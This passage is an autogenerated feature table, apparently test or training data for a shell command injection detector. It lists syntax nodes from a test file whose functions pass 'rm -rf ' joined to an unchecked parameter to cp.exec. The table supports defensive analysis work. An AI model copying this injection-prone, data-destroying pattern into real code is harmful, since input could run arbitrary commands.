Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:6:212:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:6:212:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:6:212:9 | exec | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:6:212:9 | exec | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:6:212:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:11:212:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:11:212:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:11:212:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:11:212:19 | "rm -rf " | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:11:212:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:11:212:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:11:212:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:11:212:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:11:212:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:11:212:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:11:212:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:11:212:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:11:212:26 | "rm -rf " + name | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:11:212:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:11:212:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:23:212:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:23:212:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:23:212:26 | name | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:23:212:26 | name | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:23:212:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:23:212:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:1:216:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:1:216:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:1:216:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:1:216:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:1:216:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:1:216:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:1:216:25 | module. ... ckList2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:1:216:25 | module. ... ckList2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:1:216:25 | module. ... ckList2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:1:225:1 | module. ... ENCY]\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:1:225:1 | module. ... ENCY]\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:1:225:1 | module. ... ENCY]\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:8:216:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:8:216:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:8:216:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:16:216:25 | blackList2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:16:216:25 | blackList2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:16:216:25 | blackList2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:216:28 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:216:28 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:216:28 | cp | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:216:28 | cp | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:216:28 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:216:28 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:216:28 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:216:28 | this | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:216:28 | this | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:216:28 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | 'arguments' object of anonymous function | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | exceptional return of anonymous function | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | functio ... ENCY]\\n} | assignedToPropName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | functio ... ENCY]\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 